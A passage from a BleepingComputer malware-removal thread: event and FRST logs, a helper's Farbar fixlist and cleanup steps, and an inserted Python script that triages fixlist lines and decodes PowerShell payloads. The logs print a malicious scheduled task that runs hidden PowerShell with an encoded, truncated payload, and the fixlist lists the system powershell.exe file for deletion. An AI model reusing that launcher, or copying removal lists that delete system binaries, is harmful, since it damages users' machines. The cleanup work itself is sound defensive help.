Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 10:12:29 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 09:11:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 12:22:51 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: There are currently no active network connections. Background Intelligent Transfer Service (BITS) will try again when an adapter is connected.

Error: (03/21/2018 12:12:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/19/2018 03:53:14 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: There are currently no active network connections. Background Intelligent Transfer Service (BITS) will try again when an adapter is connected.

Error: (03/19/2018 03:47:25 PM) (Source: Microsoft Office 14) (EventID: 2001) (User: )
Description: Event-ID 2001


System errors:
=============
Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 110.39.0.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=260974&clcid=0x409&NRI=true&arch=x64&eng=2.1.10302.0&sig=110.39.0.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: Network Inspection System

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 2.1.10302.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.10502.0&avdelta=1.173.618.0&asdelta=1.173.618.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: AntiSpyware

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.10502.0&avdelta=1.173.618.0&asdelta=1.173.618.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Update Server

    Update Stage: Search

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x8024402c

    Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (03/21/2018 11:03:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PDF Document Manager service failed to start due to the following error:
The system cannot find the file specified.

Error: (03/21/2018 11:01:51 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} did not register with DCOM within the required timeout.

Error: (03/21/2018 10:57:56 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 110.39.0.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=260974&clcid=0x409&NRI=true&arch=x64&eng=2.1.10302.0&sig=110.39.0.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: Network Inspection System

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 2.1.10302.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 10:57:56 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.10502.0&avdelta=1.173.618.0&asdelta=1.173.618.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: AntiSpyware

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved


==================== Memory info ===========================

Processor: AMD E-300 APU with Radeon™ HD Graphics
Percentage of memory in use: 56%
Total physical RAM: 1641.41 MB
Available physical RAM: 711.23 MB
Total Virtual: 3282.81 MB
Available Virtual: 1780.61 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:277.69 GB) (Free:234.43 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (HP_RECOVERY) (Fixed) (Total:15.11 GB) (Free:2.26 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (HP_TOOLS) (Fixed) (Total:4.98 GB) (Free:2.12 GB) FAT32

\\?\Volume{1c912cc4-7fc3-11e1-ab2d-806e6f6e6963}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.25 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 9CED46CF)
Partition 1: (Active) - (Size=300 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=277.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.1 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=5 GB) - (Type=0C)

==================== End of Addition.txt ============================





#2 nasdaq

  • Malware Response Team

Posted 23 March 2018 - 09:04 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Remove these programs in bold via the Control Panel > Programs > ...

DMUninstaller (HKLM-x32\...\DMUninstaller) (Version: - ) <==== ATTENTION
llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version: - less2pay) <==== ATTENTION
Plus-HD-1.2 (HKLM-x32\...\Plus-HD-1.2) (Version: 1.32.153.0 - Plus HD) <==== ATTENTION
Software Version Updater (HKLM-x32\...\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}) (Version: 112.47.14.333 - ) <==== ATTENTION
---

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe*******************************************************************************
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [NextLive] => C:\windows\SysWOW64\rundll32.exe "C:\Users\Tech 14\AppData\Roaming\newnext.me\nengine.dll",EntryPoint -m l
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.conduit.com/?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&SSPV=
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho64.dll [2013-12-22] (Plus HD)
BHO: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.x64.dll [2014-04-22] ()
BHO-x32: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho.dll [2013-12-22] (Plus HD)
BHO-x32: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.dll [2014-04-22] ()
Toolbar: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService [X] <==== ATTENTION

Task: {377FBCA9-E775-4F65-9277-ED0882D40ED0} - System32\Tasks\Plus-HD-1.2-updater => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe [2013-12-22] (Plus HD)
Task: {63F10999-1085-44F5-92F4-00E3050A14A6} - System32\Tasks\Plus-HD-1.2-chromeinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe [2013-12-22] (Plus HD)
Task: {6A0BBF0A-DE94-41FE-9157-FF8D9970AB11} - System32\Tasks\Plus-HD-1.2-firefoxinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe [2013-12-22] (Plus HD)
Task: {AA72BE28-D781-4FCA-A97F-27CAA5C4187D} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE} - System32\Tasks\Plus-HD-1.2-codedownloader => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe [2013-12-22] (Plus HD)
Task: {E7F157B8-18FC-44F8-9362-7CF6F27B0696} - System32\Tasks\Plus-HD-1.2-enabler => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe [2013-12-22] (Plus HD)
Task: {FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE} - System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwA7ADsAOwAgACAAOwA7ACAAIAAgADsAOwAgACAAOwAgADsAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (the data entry h... (long line)
Task: {FA9233DD-423A-457F-BD31-003D43E5F021} - System32\Tasks\AmiUpdXp => C:\Users\Tech 14\AppData\Local\29033\Updater.exe [2016-07-17] (Emirates) <==== ATTENTION
Task: C:\windows\Tasks\AmiUpdXp.job => C:\Users\Tech 14\AppData\Local\29033\Updater.exe <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe/installcrx /crxinstalltype=0 /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.crx' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdoma... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe|/reinstallapp /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /coded... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-enabler.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe?/enablebho /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe?/installxpi /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.xpi' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-updater.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe?/runupdater /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hx... (long line)
AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [126]

C:\Windows\System32\Tasks\Plus-HD-1.2-updater
C:\Program Files (x86)\Plus-HD-1.2
C:\Windows\System32\Tasks\Plus-HD-1.2-chromeinstaller
C:\Windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller
C:\Windows\System32\Tasks\LaunchSignup
C:\Program Files (x86)\MyPC Backup
C:\Windows\System32\Tasks\Plus-HD-1.2-codedownloader
C:\Windows\System32\Tasks\Plus-HD-1.2-enabler
C|Windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC}
C:\windows\system32\WindowsPowershell\v1.0\powershell.exe
C\Windows\System32\Tasks\AmiUpdXp
C:\Users\Tech 14\AppData\Local\29033
C:\Windows\\Tasks\AmiUpdXp.job
C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job
C:\windows\Tasks\Plus-HD-1.2-codedownloader.job
C:\windows\Tasks\Plus-HD-1.2-enabler.job
C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job
C:\windows\Tasks\Plus-HD-1.2-updater.job

C:\Program Files (x86)\Mobogenie
C:\Users\Tech 14\AppData\Roaming\newnext.me
C:\ProgramData\llEsss2pay
C:\ProgramData\llEsss2pay

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
---

Reset Chrome...
Open Google Chrome, click on the menu icon or the 3 vertical dots located at the top right of Google Chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the LogFile button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleanerCx.txt (x is a number).
===

Download the Junkware Removal Tool to your Desktop from this link.
http://www.bleepingcomputer.com/download/junkware-removal-tool/

Shutdown your antivirus to avoid any conflicts.
Right click the icon - disable for say 20 mins.
Right-mouse click JRT.exe and select Run as administrator (If using XP just double click on the icon to run it.)
The tool will open and start scanning your system.
Please be patient as this can take a while to complete.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.
======

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended. (You need to check with Internet Explorer) <- Important.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as a Java update!
Important: read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after these updates remove these old version(s) via the Control Panel > Programs > Programs and Features.
Java 7 Update 4 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217004FF}) (Version: 7.0.40 - Oracle)
JavaFX 2.1.0 (HKLM-x32\...\{1111706F-666A-4037-7777-210328764D10}) (Version: 2.1.0 - Oracle Corporation)
===

Please post the Fixlog.txt, the AdwCleanerCx.txt and the JRT.txt logs for my review.

Let me know what problem persists with this computer.

p.s.
Do you recognize this IP address?
199.203.131.151
Check it out: https://who.is/whois-ip/ip-address/199.203.131.151
====
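Added example, not part of the post above and not FRST's own code: a Python triage pass over fixlist-style lines that flags scheduled tasks launching PowerShell with the switches seen above, decodes the (truncated) `-EncodedCommand` value, and checks bare path lines before a fix is run. The function names and heuristics are assumptions made for illustration; the sample lines are copied from the fixlist above.

```python
import base64
import re

# Sample input: a subset of lines copied verbatim from the fixlist in the post above.
FIXLIST_SAMPLE = r"""
Task: {FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE} - System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwA7ADsAOwAgACAAOwA7ACAAIAAgADsAOwAgACAAOwAgADsAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (the data entry h... (long line)
Task: {FA9233DD-423A-457F-BD31-003D43E5F021} - System32\Tasks\AmiUpdXp => C:\Users\Tech 14\AppData\Local\29033\Updater.exe [2016-07-17] (Emirates) <==== ATTENTION
C:\Program Files (x86)\MyPC Backup
C|Windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC}
C:\windows\system32\WindowsPowershell\v1.0\powershell.exe
C\Windows\System32\Tasks\AmiUpdXp
C:\Users\Tech 14\AppData\Local\29033
"""

# "Task: [{GUID} - ]<task name or .job path> => <command line>"
TASK_RE = re.compile(r"^Task: (?:\{[0-9A-Fa-f-]+\} - )?(?P<name>.+?) => (?P<cmd>.+)$")
# PowerShell switches that hide a task's window and content (all appear in the log above).
PS_SWITCHES = ("-windowstyle hidden", "-executionpolicy bypass", "-encodedcommand")
# A bare path line: drive letter followed by ':' or a typo in its place.
PATH_LINE_RE = re.compile(r"^[A-Za-z][:|\\]")


def decode_encoded_command(blob):
    """Decode a possibly truncated PowerShell -EncodedCommand value.

    The value is base64 over UTF-16LE text. Logs often cut it short, so trim to
    whole base64 quanta and whole 16-bit code units before decoding.
    """
    b64 = re.match(r"[A-Za-z0-9+/]*", blob).group(0)
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le", errors="replace")


def triage_task(line):
    """Return a finding for a Task: line, or None if nothing stands out."""
    m = TASK_RE.match(line)
    if not m:
        return None
    cmd = m.group("cmd")
    low = cmd.lower()
    reasons = [s for s in PS_SWITCHES if s in low] if "powershell.exe" in low else []
    if re.search(r"\\appdata\\(local|roaming)\\", low):
        reasons.append("runs from a user AppData folder")
    enc = re.search(r"-EncodedCommand\s+(\S+)", cmd, re.I)
    decoded = decode_encoded_command(enc.group(1)) if enc else None
    if not reasons:
        return None
    return {"kind": "task", "item": m.group("name"), "reasons": reasons, "decoded": decoded}


def lint_path(line):
    """Check a bare path line before it is handed to a removal tool."""
    reasons = []
    if not re.match(r"^[A-Za-z]:\\", line):
        reasons.append("malformed drive prefix")
    if re.match(r"^[A-Za-z]:\\windows\\(system32|syswow64)\\.+\.(exe|dll)$", line, re.I):
        reasons.append("targets a file under the Windows system directory")
    if not reasons:
        return None
    return {"kind": "path", "item": line, "reasons": reasons, "decoded": None}


def triage_fixlist(text):
    """Walk fixlist lines and collect task and path findings in input order."""
    findings = []
    for line in filter(None, map(str.strip, text.splitlines())):
        if line.startswith("Task:"):
            finding = triage_task(line)
        elif PATH_LINE_RE.match(line):
            finding = lint_path(line)
        else:
            finding = None
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage_fixlist(FIXLIST_SAMPLE):
        print(f["kind"], "|", f["item"], "|", "; ".join(f["reasons"]))
        if f["decoded"]:
            print("    decoded prefix:", repr(f["decoded"]))
```

The decoded prefix is only as long as what the log retained, so it identifies the script's opening statements rather than its full behaviour.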

#3 starblazers

Posted 25 March 2018 - 11:07 AM

Hello nasdaq, thank you for assisting me!

I did all of the things you asked, although I could not uninstall

llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version: - less2pay)

When I attempted to do so, a popup told me that I "do not have sufficient access to uninstall" it and to contact my system administrator.

Everything else, however, I have done. I am posting the fixlog.txt, the AdwCleanerCx.txt and the JRT.txt logs as requested.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Tech 14 (23-03-2018 21:53:40) Run:1
Running from C:\Users\Tech 14\Desktop
Loaded Profiles: Tech 14 (Available Profiles: Tech 14)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe*******************************************************************************
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [NextLive] => C:\windows\SysWOW64\rundll32.exe "C:\Users\Tech 14\AppData\Roaming\newnext.me\nengine.dll",EntryPoint -m l
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.conduit.com/?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&SSPV=
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
